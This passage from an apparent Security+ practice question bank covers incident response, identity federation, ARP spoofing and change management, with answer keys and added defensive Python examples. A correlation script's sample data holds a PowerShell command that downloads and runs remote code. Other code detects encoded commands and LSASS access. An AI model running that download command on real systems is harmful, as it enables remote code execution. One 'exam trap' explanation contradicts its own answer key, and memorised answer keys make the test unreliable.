Option B is wrong because restoring from backup while the server is still connected risks re-encrypting the restored files if the ransomware process is active, and it violates the containment-first principle. Option C is wrong because powering off the server may cause loss of volatile forensic data (e.g., memory-resident encryption keys, running processes) and can trigger anti-forensic behaviors in some ransomware strains. Option D is wrong because notifying users to change passwords before technical containment wastes critical time; the immediate threat is active encryption, not credential compromise, and password changes should occur after containment and eradication.

920
Multi-Selecthard

A post-incident review shows the SOC detected malicious PowerShell activity six hours late because the existing detections did not correlate the encoded command, the unusual outbound connection, and the creation of a scheduled task. Leadership wants the two follow-up actions most likely to improve future response. Select two.

Select 2 answers
A.Add the new indicators and event patterns to SIEM and EDR detections.
B.Revise the incident response playbook so analysts know the new escalation and containment steps.
C.Restore the compromised host to production immediately after the next reboot.
D.Reduce log retention to keep storage costs low.
E.Disable PowerShell everywhere without reviewing business requirements or alternatives.
AnswersA, B

Updating detections helps the security stack recognize the same behavior earlier in the future, and revising the playbook ensures analysts know how to escalate and contain it once the alert fires.

Why this answer

Option A is correct because adding the new indicators (encoded command, unusual outbound connection, scheduled task creation) and event patterns to SIEM and EDR detections directly addresses the root cause of the six-hour delay: the lack of correlation between these specific events. By updating detection rules to correlate these patterns, the SOC can trigger alerts in near-real time rather than relying on manual post-hoc analysis. This is a core SIEM/EDR tuning practice to reduce mean time to detect (MTTD).

Exam trap

The trap here is that candidates may think updating the playbook (Option B) is the primary fix, but the question specifically asks for actions that improve future *detection* and *response* speed, and while playbook revision helps, the root cause was missing detection logic, not missing procedural steps.
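
The correlation logic questions 918 and 920 describe, as an added example that is not part of the original page or any vendor product: three individually weak signals (an encoded PowerShell command, an outbound connection to a rarely seen destination, and a scheduled-task creation) are only raised as one alert when they all occur on the same host inside a time window. The event schema, hostnames, addresses, timestamps and the `rare_dest` enrichment flag are constructed assumptions; the encoded-command aliases (`-e`, `-ec`, `-enc`, `-EncodedCommand`) and the UTF-16LE base64 encoding are how PowerShell actually behaves.

```python
"""Correlate three weak signals into one alert per host, SIEM-style.

Added example for the SIEM questions above (918 and 920); not taken from the page
or from any vendor product. Event schema, hostnames, addresses and timestamps
are constructed for illustration.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)
REQUIRED = {"encoded_powershell", "rare_outbound", "scheduled_task"}

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 (UTF-16LE) script.
ENC_RE = re.compile(r"(?i)powershell(?:\.exe)?.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SCHTASKS_RE = re.compile(r"(?i)schtasks(?:\.exe)?\s+/create\b")


def b64_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events after normalisation into one schema (ts, host, type, ...).
SAMPLE_EVENTS = [
    # WS-FIN-07: all three signals inside 15 minutes -> should alert
    {"ts": "2024-05-01T09:00:05", "host": "WS-FIN-07", "type": "process",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + b64_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')")},
    {"ts": "2024-05-01T09:00:09", "host": "WS-FIN-07", "type": "netconn",
     "dest": "203.0.113.9", "port": 8443, "rare_dest": True},
    {"ts": "2024-05-01T09:01:30", "host": "WS-FIN-07", "type": "process",
     "cmdline": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\u.ps1 /sc onlogon"},
    # WS-HR-02: an encoded command on its own (common admin tooling) -> no alert
    {"ts": "2024-05-01T10:12:00", "host": "WS-HR-02", "type": "process",
     "cmdline": "powershell.exe -EncodedCommand " + b64_ps("Get-Service")},
    # WS-IT-01: same three signals spread over two hours -> outside the window
    {"ts": "2024-05-01T08:00:00", "host": "WS-IT-01", "type": "process",
     "cmdline": "powershell.exe -enc " + b64_ps("Get-HotFix")},
    {"ts": "2024-05-01T08:40:00", "host": "WS-IT-01", "type": "netconn",
     "dest": "198.51.100.23", "port": 443, "rare_dest": True},
    {"ts": "2024-05-01T10:00:00", "host": "WS-IT-01", "type": "process",
     "cmdline": "schtasks /create /tn Inventory /tr inv.exe /sc daily"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded PowerShell command."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid UTF-16LE base64: still suspicious, just not decodable


def classify(event: dict):
    """Map one normalised event to a signal name, or None if it is noise."""
    if event["type"] == "process":
        if ENC_RE.search(event.get("cmdline", "")):
            return "encoded_powershell"
        if SCHTASKS_RE.search(event.get("cmdline", "")):
            return "scheduled_task"
    elif event["type"] == "netconn" and event.get("rare_dest"):
        return "rare_outbound"  # enrichment flag: destination rarely seen org-wide
    return None


def correlate(events, window=WINDOW):
    """Emit one alert per host where all REQUIRED signals occur within `window`."""
    by_host = defaultdict(list)
    for ev in events:
        sig = classify(ev)
        if sig:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), sig, ev))
    alerts = []
    for host, sigs in by_host.items():
        sigs.sort(key=lambda s: s[0])
        for i, (t0, _, _) in enumerate(sigs):
            in_window = [s for s in sigs[i:] if s[0] - t0 <= window]
            seen = {s[1] for s in in_window}
            if REQUIRED <= seen:
                enc = next(ev for _, sig, ev in in_window if sig == "encoded_powershell")
                alerts.append({"host": host, "first_seen": t0.isoformat(),
                               "signals": sorted(seen),
                               "decoded_command": decode_encoded_command(enc["cmdline"])})
                break  # one alert per host for this chain
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Run as a script it prints the single WS-FIN-07 alert with the decoded download cradle; WS-HR-02 stays quiet because an encoded command alone is everyday admin behaviour, and WS-IT-01 stays quiet because its three signals are hours apart. Widening `window` is the tuning knob: too narrow and a slow operator slips through, too wide and unrelated admin activity starts correlating.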

921
MCQmedium

EDR flags encoded PowerShell launched by a spreadsheet application, followed by an attempt to access LSASS and outbound HTTPS traffic to a rare domain. What should the analyst do first from the EDR console?

A.Reboot the endpoint to terminate the suspicious processes
B.Isolate the endpoint from the network while keeping it powered on
C.Uninstall the spreadsheet application immediately
D.Block the rare domain and close the alert
AnswerB

Isolation stops further communication and lateral movement while preserving evidence on a live system.

Why this answer

Option B is correct because isolating the endpoint from the network while keeping it powered on preserves volatile evidence (e.g., running processes, memory contents) and prevents the attacker from exfiltrating data or establishing further C2 communication. The EDR console allows immediate network isolation without losing the ability to perform live forensics or memory analysis. This aligns with the incident response priority of containment before eradication or recovery.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (reboot or uninstall), failing to recognize that preserving volatile evidence is critical for understanding the attack vector and scope before taking destructive actions.

How to eliminate wrong answers

Option A is wrong because rebooting the endpoint destroys volatile evidence in memory (e.g., LSASS dump artifacts, injected code) and may allow persistence mechanisms to re-execute on startup, potentially losing the forensic trail. Option C is wrong because uninstalling the spreadsheet application is a premature remediation step that destroys evidence and does not address the active threat; the analyst must first contain the endpoint to prevent lateral movement or data exfiltration. Option D is wrong because blocking a single domain and closing the alert treats one indicator rather than the compromise: the encoded PowerShell and the LSASS access attempt point to credential theft in progress, the attacker can simply fail over to another domain, and the endpoint must be contained and investigated before the alert is closed.

922
MCQmedium

Employees must sign in to several SaaS applications with corporate credentials, and terminated users should lose access quickly without manual changes in each app. Which solution best meets the requirement?

A.Create separate local usernames and passwords in each SaaS application.
B.Use federation for sign-on and automated provisioning and deprovisioning through an identity lifecycle process.
C.Require users to share one department password for each SaaS platform.
D.Store the same password in every application vault and sync it nightly.
AnswerB

Federation allows users to authenticate with the corporate identity provider, while automated provisioning helps create, update, and disable accounts across connected SaaS apps. This design supports single sign-on, faster offboarding, and centralized control over access lifecycle changes. It also reduces the risk of forgotten orphaned accounts remaining active after termination.

Why this answer

Federation enables single sign-on (SSO) using standards like SAML 2.0 or OIDC, allowing users to authenticate once with corporate credentials across multiple SaaS apps. Automated provisioning and deprovisioning via SCIM (System for Cross-domain Identity Management) lets the identity provider disable a terminated employee in every connected application as soon as the termination is processed, without manual changes in each app, meeting the requirement for rapid access removal. Sessions already established in an application can persist until they expire, so short session lifetimes and applications that re-check the account's active status complement SCIM deprovisioning.

Exam trap

The trap here is that candidates may confuse federation with simple SSO, overlooking the automated provisioning/deprovisioning component that is essential for the 'lose access quickly' requirement, and instead pick a password-vaulting solution thinking it centralizes credentials.

How to eliminate wrong answers

Option A is wrong because creating separate local usernames and passwords in each SaaS app requires manual management for each account, making it impossible to quickly revoke access for terminated users across all apps without individual changes. Option C is wrong because sharing one department password violates the principle of least privilege and non-repudiation, as it prevents individual accountability and does not allow targeted revocation for a single terminated user. Option D is wrong because storing the same password in every application vault and syncing it nightly does not provide immediate access revocation; a terminated user could still authenticate until the next sync, and reusing one password across apps means a single compromised vault exposes all of them.
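
The lifecycle described above, as an added example that is not part of the original page or any IdP or SaaS vendor's code: an identity provider issues assertions for active users and pushes a SCIM PatchOp that sets `active` to false in every connected application on termination, while an application whose account was created by hand is left orphaned. The user and tenant names are constructed; the PatchOp body is the shape defined by RFC 7644 (SCIM 2.0 protocol), and the assertion is a simplified stand-in for a SAML or OIDC token.

```python
"""Federated sign-on plus SCIM deprovisioning: disabling one identity at the IdP
closes access everywhere it was provisioned, and a check for what it missed.

Added example for the SaaS identity question above; not from the page or any
IdP/SaaS vendor. Users and app names are constructed; the PatchOp body follows
RFC 7644 (SCIM 2.0); the assertion is a simplified SAML/OIDC stand-in.
"""
from datetime import datetime, timedelta, timezone

SCIM_PATCH_SCHEMA = "urn:ietf:params:scim:api:messages:2.0:PatchOp"


def scim_deactivate_request() -> dict:
    """Body of PATCH /scim/v2/Users/{id} that an IdP sends when a user is terminated."""
    return {"schemas": [SCIM_PATCH_SCHEMA],
            "Operations": [{"op": "replace", "path": "active", "value": False}]}


class SaaSApp:
    """A service provider that trusts the IdP for login and (ideally) for lifecycle."""
    def __init__(self, name: str):
        self.name, self.users = name, {}

    def create_user(self, user_id: str, user_name: str) -> None:
        self.users[user_id] = {"userName": user_name, "active": True}

    def scim_patch(self, user_id: str, body: dict) -> None:
        if SCIM_PATCH_SCHEMA not in body.get("schemas", []):
            raise ValueError("not a SCIM PatchOp")
        for op in body["Operations"]:
            if op["op"] == "replace" and op["path"] == "active":
                self.users[user_id]["active"] = bool(op["value"])

    def accept_sso(self, assertion: dict) -> bool:
        """Let a federated subject in only if the local record is still active."""
        u = self.users.get(assertion["sub"])
        return bool(u and u["active"] and assertion["exp"] > datetime.now(timezone.utc))


class IdentityProvider:
    def __init__(self):
        self.directory, self.apps = {}, []

    def onboard(self, user_id: str, user_name: str, apps) -> None:
        self.directory[user_id] = {"userName": user_name, "active": True}
        for app in apps:
            if app not in self.apps:
                self.apps.append(app)        # SCIM-connected: lifecycle flows from here
            app.create_user(user_id, user_name)

    def issue_assertion(self, user_id: str):
        """SAML/OIDC-style assertion; nothing is issued for a disabled identity."""
        u = self.directory.get(user_id)
        if not u or not u["active"]:
            return None
        return {"sub": user_id, "exp": datetime.now(timezone.utc) + timedelta(hours=1)}

    def terminate(self, user_id: str) -> None:
        """One lifecycle action: disable at the IdP, then push SCIM deactivation."""
        self.directory[user_id]["active"] = False
        body = scim_deactivate_request()
        for app in self.apps:
            if user_id in app.users:
                app.scim_patch(user_id, body)


def orphaned_accounts(idp: IdentityProvider, apps) -> list:
    """Active app accounts whose IdP identity is disabled or unknown: the accounts
    that manual, per-app provisioning leaves behind after a termination."""
    found = []
    for app in apps:
        for uid, u in app.users.items():
            ident = idp.directory.get(uid)
            if u["active"] and (ident is None or not ident["active"]):
                found.append((app.name, uid))
    return sorted(found)
```

The orphan report is the control that catches option A's failure mode in practice: any application that was not connected through SCIM (here the hand-provisioned `legacy-wiki`) keeps the account active after the IdP disables the person, so the report should run on a schedule, not only during audits.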

923
MCQeasy

After an employee successfully signs in to a file-sharing portal, the portal checks whether the employee can upload files to a specific project folder. Which AAA concept is being used?

A.Authentication, because the user proved their identity with credentials.
B.Authorization, because the system is deciding what the signed-in user is allowed to do.
C.Accounting, because the portal is recording the folder permissions for later review.
D.Nonrepudiation, because the portal proves the user cannot deny uploading a file.
AnswerB

Authorization is the process of determining permissions after identity has been confirmed. In this case, the portal is checking whether the authenticated user may upload files to a particular folder. That is a classic authorization decision because it controls access to a resource based on assigned rights, roles, or group membership.

Why this answer

After the user successfully signs in (authentication), the portal checks permissions to determine if they can upload files to a specific project folder. This is the definition of authorization: verifying what an authenticated user is allowed to do. The system is enforcing access control based on the user's identity and the folder's permissions.

Exam trap

The trap here is that candidates confuse the initial login (authentication) with the subsequent permission check (authorization), often selecting 'Authentication' because they see 'signs in' and assume the entire process is about identity verification.

How to eliminate wrong answers

Option A is wrong because authentication is the process of verifying identity (e.g., with a password or MFA), which has already occurred before the portal checks upload permissions; the question describes a post-login permission check, not identity verification. Option C is wrong because accounting involves logging and tracking user activities (e.g., upload events, timestamps) for auditing or billing, not checking permissions against a folder. Option D is wrong because nonrepudiation ensures a user cannot deny an action (e.g., via digital signatures or audit logs), but the scenario is about a pre-action permission check, not proving an action occurred.

924
MCQmedium

A payroll application allows the same user to create a vendor and approve a payment. The security team wants to reduce fraud without adding unnecessary complexity. Which principle should they apply?

A.Separation of duties, so no single person can complete the entire high-risk workflow.
B.Job rotation, so employees periodically switch responsibilities to learn each other’s tasks.
C.Defense in depth, so multiple technical tools inspect every payment form.
D.Least privilege, so the payroll user can create and approve only this one vendor payment.
AnswerA

Separation of duties is the best control when one person should not be able to create and approve the same payment. By splitting responsibilities across different roles or approvals, the organization reduces the chance of fraud, abuse, or accidental misuse. This principle is common in finance and payroll workflows because it provides meaningful risk reduction without requiring a complicated technical redesign of the entire application.

Why this answer

Separation of duties (option A) is the correct principle because it prevents a single user from both creating a vendor and approving a payment, which would allow that user to commit fraud by setting up a fake vendor and authorizing a payment to it. By splitting these high-risk tasks between two or more people, the organization enforces a dual-control mechanism that reduces the risk of internal fraud without adding complex technical controls. This aligns with the security team's goal of reducing fraud while avoiding unnecessary complexity.

Exam trap

The trap here is that candidates often confuse separation of duties with job rotation or defense in depth, mistakenly thinking that rotating employees or adding more technical controls will prevent internal fraud, when in fact only splitting conflicting responsibilities directly addresses the risk of a single user completing a high-risk workflow.

How to eliminate wrong answers

Option B is wrong because job rotation involves periodically rotating employees through different roles to cross-train and detect irregularities, but it does not prevent a single user from completing the entire vendor creation and payment approval workflow at any given time; fraud could still occur during the current assignment. Option C is wrong because defense in depth is a layered security strategy that uses multiple technical controls (e.g., firewalls, IDS, encryption) to protect against external threats, but it does not address the internal segregation of conflicting duties; adding more technical tools to inspect payment forms would increase complexity without directly preventing the same user from performing both actions. Option D is wrong because least privilege, as worded, still leaves the same person able to both create and approve the vendor payment; trimming that user's rights to a single vendor does not split the conflicting duties, which is the actual fraud risk.

925
MCQmedium

An EDR alert flags suspicious PowerShell on a finance workstation. Windows logs show the script started immediately after a patch-management tool launched from the software distribution server. The script only queries installed software and writes results to a log file. What is the most likely conclusion?

A.The alert is likely a false positive because the activity matches approved patch-management behavior
B.The workstation is definitely compromised because PowerShell is always malicious
C.The endpoint should be immediately wiped because the script wrote to a log file
D.The software distribution server should be blocked from the network permanently
AnswerA

The script behavior matches a normal inventory or patching task, and the timing with the distribution server supports legitimate administration.

Why this answer

The EDR alert is likely a false positive because the PowerShell script's behavior—querying installed software and writing results to a log file—is consistent with legitimate patch-management inventory tasks. The script's execution immediately after the patch-management tool launched from the software distribution server indicates it was triggered by that tool as part of its normal operations, not by an attacker. Since the activity matches approved patch-management behavior and shows no signs of malicious intent (e.g., data exfiltration, lateral movement, or persistence), the alert should be investigated but is most likely a false positive.

Exam trap

The trap here is that candidates often assume any PowerShell execution is malicious, but the SY0-701 exam tests the ability to correlate process ancestry and script behavior to distinguish legitimate administrative activity from actual threats.

How to eliminate wrong answers

Option B is wrong because it incorrectly assumes PowerShell is always malicious, ignoring that PowerShell is a legitimate administrative tool widely used for automation and inventory tasks in enterprise environments. Option C is wrong because writing to a log file is a standard, non-malicious operation; immediate wiping is an extreme and unnecessary response that would disrupt business operations without evidence of compromise. Option D is wrong because permanently blocking the software distribution server would break critical patch-management workflows; the server is the likely source of the legitimate script, not a threat actor.
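
The triage reasoning in questions 921 and 925, as an added example that is not part of the original page or any EDR product: the same "PowerShell launched" alert is scored from its process ancestry and observed behaviour, so a spreadsheet spawning an encoded shell that touches LSASS is contained, a known distribution agent running a read-only inventory script is downgraded, and an approved parent never excuses credential access. The agent name, share path, behaviour labels and weights are constructed assumptions a SOC would tune against its own telemetry.

```python
"""Triage an EDR PowerShell alert from process ancestry plus observed behaviour.

Added example for the two EDR questions above (spreadsheet -> PowerShell -> LSASS,
and patch agent -> PowerShell -> inventory); not from the page or any EDR vendor.
Tool names, paths, behaviour labels and weights are constructed assumptions.
"""

# Assumed allowlist: the approved distribution agent and the exact share it runs from.
APPROVED_PARENTS = {("patchagent.exe", r"\\distsrv\deploy$\patchagent.exe")}
# Applications that should almost never spawn a shell.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Read-only inventory work that patch tooling is expected to do.
BENIGN_BEHAVIOURS = {"inventory_query", "file_write_log"}
# Behaviours that no parent process is allowed to excuse.
CRITICAL_BEHAVIOURS = {"lsass_access", "credential_dump"}

WEIGHTS = {  # constructed weights; each SOC tunes these against its own telemetry
    "encoded_command": 10,
    "office_parent": 30,
    "rare_domain_https": 25,
    "lsass_access": 40,
    "credential_dump": 50,
    "persistence": 20,
}

# Constructed alerts as an EDR might present them after enrichment.
SAMPLE_ALERTS = [
    {"id": "A-1", "host": "WS-FIN-03",            # question 921
     "parent": {"name": "EXCEL.EXE",
                "path": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
     "child": "powershell.exe -nop -w hidden -enc JABhAD0AMQA=",
     "behaviours": ["encoded_command", "lsass_access", "rare_domain_https"]},
    {"id": "A-2", "host": "WS-FIN-11",            # question 925
     "parent": {"name": "PatchAgent.exe", "path": r"\\distsrv\deploy$\PatchAgent.exe"},
     "child": "powershell.exe -File inventory.ps1",
     "behaviours": ["inventory_query", "file_write_log"]},
    {"id": "A-3", "host": "WS-FIN-12",            # approved parent, but LSASS was touched
     "parent": {"name": "PatchAgent.exe", "path": r"\\distsrv\deploy$\PatchAgent.exe"},
     "child": "powershell.exe -File inventory.ps1",
     "behaviours": ["inventory_query", "lsass_access"]},
]


def parent_is_approved(parent: dict) -> bool:
    """Match name AND full path: a same-named binary in a user-writable directory fails."""
    return (parent["name"].lower(), parent["path"].lower()) in {
        (n.lower(), p.lower()) for n, p in APPROVED_PARENTS}


def triage(alert: dict) -> dict:
    """Return a verdict, a score and the reasons; no single field decides on its own."""
    behaviours = set(alert["behaviours"])
    reasons, score = [], 0
    parent_name = alert["parent"]["name"].lower()

    if parent_name in OFFICE_APPS:
        score += WEIGHTS["office_parent"]
        reasons.append(f"{parent_name} spawned PowerShell")
    for b in sorted(behaviours):
        if b in WEIGHTS:
            score += WEIGHTS[b]
            reasons.append(b)

    approved = parent_is_approved(alert["parent"])
    if approved and behaviours <= BENIGN_BEHAVIOURS:
        score = 0  # expected patch-management inventory run
        reasons.append("approved distribution agent with read-only inventory behaviour")
    elif approved:
        reasons.append("approved parent but unexpected behaviour; do not auto-close")

    if behaviours & CRITICAL_BEHAVIOURS or score >= 60:
        verdict = "isolate_host"           # contain first; keep it powered on for forensics
    elif score >= 30:
        verdict = "investigate"
    else:
        verdict = "likely_false_positive"  # record it and tune the rule; do not delete the alert
    return {"id": alert["id"], "verdict": verdict, "score": score, "reasons": reasons}


if __name__ == "__main__":
    for alert in SAMPLE_ALERTS:
        print(triage(alert))
```

A-1 scores 105 and is isolated, A-2 is downgraded to a likely false positive because both the parent and the behaviour match the approved inventory job, and A-3 is isolated despite the approved parent because LSASS access is never excused by ancestry; that third case is the one an analyst should not let an allowlist hide.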

926
MCQmedium

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

A.Ransomware
B.Rootkit
C.Trojan horse
D.Polymorphic malware
AnswerC

Correct. A Trojan horse masquerades as benign software, often from a seemingly trusted source. It can evade signature-based anti-malware and silently establish outbound connections to a malicious IP for command-and-control, data exfiltration, or further payload delivery.

Why this answer

The Trojan horse is correct because it is a type of malware that disguises itself as legitimate software, often downloaded from trusted sources like an approved application store, to bypass security controls. Once installed, it can silently establish outbound connections to a command-and-control (C2) server, such as the known malicious IP address observed, without triggering anti-malware alerts if the Trojan is not yet in the signature database. This matches the scenario where the user downloaded from an approved store, the anti-malware reported no alerts, and the workstation is communicating with a malicious IP.

Exam trap

The trap here is that candidates may confuse a rootkit's stealth capabilities with the Trojan's social engineering vector, overlooking that the approved store download is a classic Trojan delivery method, not a rootkit's typical infection path.

How to eliminate wrong answers

Option A is wrong because ransomware typically announces its presence with a ransom note and encryption of files, not by silently generating repeated outbound traffic to a malicious IP without alerts. Option B is wrong because a rootkit is designed to hide its presence by modifying the operating system kernel or drivers, which would likely evade anti-malware detection but does not inherently explain the user downloading from an approved store; rootkits are usually installed via exploits or bundled with other malware, not typically disguised as a legitimate app from an approved store. Option D is wrong because polymorphic malware describes how code mutates to evade signature detection, not how it arrives or what it does; it might explain the missing alerts, but the approved-store download and the quiet outbound connections are explained by a Trojan, which can itself be polymorphic.

927
MCQmedium

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

A.Replay attack
B.ARP spoofing
C.DNS amplification
D.Man-in-the-middle via TLS downgrade
AnswerB

ARP spoofing, also called ARP poisoning, forges ARP replies so hosts associate the gateway IP with the attacker MAC address.

Why this answer

The correct answer is B, ARP spoofing. The symptoms—intermittent gateway unreachability, ARP replies mapping the gateway IP to a different MAC address, and repeated unsolicited ARP replies—are classic indicators of an ARP spoofing (also called ARP poisoning) attack. The attacker sends forged ARP replies to associate their own MAC address with the gateway IP, causing traffic destined for the gateway to be sent to the attacker instead, disrupting connectivity.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a man-in-the-middle attack in general, but the question specifically describes ARP-level manipulation (forged ARP replies mapping the gateway IP to a different MAC), which is the defining characteristic of ARP spoofing, not a TLS downgrade or replay attack.

How to eliminate wrong answers

Option A is wrong because a replay attack involves capturing and retransmitting valid data packets (e.g., authentication tokens) to trick a system, not sending forged ARP replies to redirect traffic. Option C is wrong because a DNS amplification attack is a type of DDoS that uses open DNS resolvers to flood a target with large DNS responses, and it does not involve manipulating ARP tables or causing intermittent gateway reachability. Option D is wrong because a man-in-the-middle via TLS downgrade attack forces a connection to use a weaker TLS version or cipher, but it does not involve ARP spoofing or sending forged ARP replies; it operates at the transport/application layer, not the data link layer.
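
The two indicators the question describes, one IP mapped to two different MAC addresses and one host answering every few seconds without being asked, as an added example that is not part of the original page: a small parser for tcpdump-style ARP lines and an analyser that reports both conditions. The capture lines, addresses and MACs are constructed, and the known-good gateway mapping is assumed to come from the DHCP or static inventory.

```python
"""Spot ARP spoofing in a capture: one IP claimed by several MACs, plus a host
that keeps sending replies nobody asked for.

Added example for the ARP question above; not from the page. The capture is
constructed in tcpdump's ARP text style; addresses and MACs are made up, and the
KNOWN_GOOD table stands in for the DHCP/static inventory.
"""
import re
from collections import defaultdict

KNOWN_GOOD = {"10.0.0.1": "aa:bb:cc:00:00:01"}   # assumed gateway record from inventory
REQ_RE = re.compile(r"^(\S+) ARP, Request who-has (\S+) tell (\S+)")
REP_RE = re.compile(r"^(\S+) ARP, Reply (\S+) is-at (\S+?),")

SAMPLE_CAPTURE = """\
09:00:00.100 ARP, Request who-has 10.0.0.1 tell 10.0.0.25, length 28
09:00:00.101 ARP, Reply 10.0.0.1 is-at aa:bb:cc:00:00:01, length 28
09:00:02.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28
09:00:04.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28
09:00:06.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28
09:00:07.300 ARP, Request who-has 10.0.0.40 tell 10.0.0.25, length 28
09:00:07.301 ARP, Reply 10.0.0.40 is-at aa:bb:cc:00:00:40, length 28
09:00:08.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28
"""


def parse_ts(text: str) -> float:
    """HH:MM:SS.fff -> seconds since midnight."""
    h, m, s = text.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_capture(text: str):
    """Yield (kind, ts, ip, mac_or_requester) for each ARP line; skip anything else."""
    for line in text.splitlines():
        if m := REQ_RE.match(line):
            yield ("request", parse_ts(m[1]), m[2], m[3])
        elif m := REP_RE.match(line):
            yield ("reply", parse_ts(m[1]), m[2], m[3].lower())


def analyse(text: str, solicit_window: float = 1.0, min_unsolicited: int = 3) -> list:
    """Report IPs claimed by more than one MAC and MACs that repeatedly answer unasked."""
    last_request = {}                 # ip -> ts of the most recent who-has for it
    claims = defaultdict(set)         # ip -> MACs seen claiming it
    unsolicited = defaultdict(list)   # (ip, mac) -> timestamps of gratuitous replies
    for kind, ts, ip, other in parse_capture(text):
        if kind == "request":
            last_request[ip] = ts
            continue
        claims[ip].add(other)
        asked = last_request.get(ip)
        if asked is None or ts - asked > solicit_window:
            unsolicited[(ip, other)].append(ts)

    findings = []
    for ip, macs in claims.items():
        if len(macs) > 1:
            good = KNOWN_GOOD.get(ip)
            suspects = sorted(m for m in macs if m != good) if good else sorted(macs)
            findings.append({"type": "conflict", "ip": ip, "macs": sorted(macs),
                             "suspect_macs": suspects})
    for (ip, mac), stamps in unsolicited.items():
        if len(stamps) >= min_unsolicited:
            gaps = [b - a for a, b in zip(stamps, stamps[1:])]
            findings.append({"type": "gratuitous_flood", "ip": ip, "mac": mac,
                             "count": len(stamps),
                             "avg_interval_s": round(sum(gaps) / len(gaps), 2)})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_CAPTURE):
        print(f)
```

On the sample capture the gateway is claimed by both its inventory MAC and `de:ad:be:ef:00:99`, and the second MAC sends four unsolicited replies about two seconds apart, which is the cadence the question describes. Legitimate gratuitous ARP exists (router failover and VRRP announce themselves this way), so the known-good mapping is what turns "unsolicited" into "suspect"; on the network side the same evidence is what switch features such as Dynamic ARP Inspection use to drop replies that contradict the DHCP binding.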

928
MCQeasy

A firewall rule must be changed to allow a vendor update server. Which step best reduces the chance of an unexpected outage?

A.Make the change directly in production without review to save time.
B.Document the change, get approval, and include a rollback plan.
C.Disable the firewall temporarily while the update is tested.
D.Apply the rule but do not tell anyone so there is less paperwork.
AnswerB

This is the best answer because secure change management uses approval and rollback planning to reduce operational risk. Documenting the requested change ensures the impact is reviewed, and a rollback plan gives the team a way to quickly restore service if the update causes problems. These controls help prevent outages caused by rushed or poorly understood production changes.

Why this answer

Option B is correct because following a formal change management process—documenting the change, obtaining approval, and including a rollback plan—ensures that the firewall rule modification is reviewed for potential impacts, authorized by stakeholders, and can be reverted if it causes an outage. This structured approach minimizes the risk of unexpected downtime by validating the change in a controlled manner and providing a safety net.

Exam trap

CompTIA often tests the misconception that speed or convenience (like disabling the firewall or skipping approval) is acceptable for urgent changes, but the exam emphasizes that proper change management is always required to prevent outages and maintain security.

How to eliminate wrong answers

Option A is wrong because making the change directly in production without review bypasses change management, increasing the risk of misconfiguration or unintended access that could cause an outage. Option C is wrong because disabling the firewall temporarily exposes the network to all traffic, creating a security vulnerability and potentially causing a different type of outage from malicious activity. Option D is wrong because applying the rule without notification violates change control policies, prevents stakeholders from preparing for potential impacts, and eliminates the ability to coordinate a rollback if issues arise.

929
MCQmedium

A contractor is assigned to a single merger project. The manager approves access to only the project share and the project chat space, even though the contractor technically could use other collaboration tools. Which principle is most directly reflected?

A.Need-to-know
B.Least privilege
C.Integrity
D.Zero trust
AnswerA

The contractor is given access only to information and resources required for the assigned project work.

Why this answer

The correct answer is A, need-to-know, because the manager restricts the contractor's access to only the project share and project chat space, even though the contractor could technically use other collaboration tools. Need-to-know is a principle that limits access to information or resources strictly required for an individual's job duties, regardless of their clearance or technical capability. In this scenario, the contractor is given access only to the specific resources necessary for the merger project, directly reflecting the need-to-know principle.

Exam trap

CompTIA often tests the distinction between need-to-know and least privilege by presenting a scenario where access is limited to specific resources (need-to-know) rather than limiting permissions within a resource (least privilege), causing candidates to confuse the two principles.

How to eliminate wrong answers

Option B (Least privilege) is wrong because least privilege focuses on granting the minimum permissions or rights (e.g., read-only vs. write) to perform a task, not on limiting access to specific resources based on job role. Here, the contractor is denied access to entire tools, not just reduced permissions within them. Option C (Integrity) is wrong because integrity refers to the assurance that data has not been altered or destroyed in an unauthorized manner, typically enforced via hashing (e.g., SHA-256) or access controls like write permissions, not by restricting access to specific collaboration tools.

Option D (Zero trust) is wrong because zero trust is a security model that assumes no implicit trust and requires continuous verification of every access request (e.g., via multifactor authentication and micro-segmentation), not simply limiting access to a project share and chat space based on a single project assignment.

930
MCQhard

Based on the exhibit, which action is required to keep the backups restorable after the key-encryption key rotation?

A.Delete vault-kek-v1 immediately so only the newest key remains active.
B.Rewrap or keep access to the old KEK version until existing DEKs are migrated.
C.Re-encrypt the entire backup repository with a single shared password.
D.Export vault-kek-v2 into the backup files so each object stores the new key directly.
AnswerB

This is correct because the backups still depend on the old key-encryption key to unwrap their data-encryption keys. During key rotation, the organization must either keep the old KEK available or rewrap the DEKs with the new KEK before retiring the old one. That preserves restore capability without forcing a full mass re-encryption of the backup data.

Why this answer

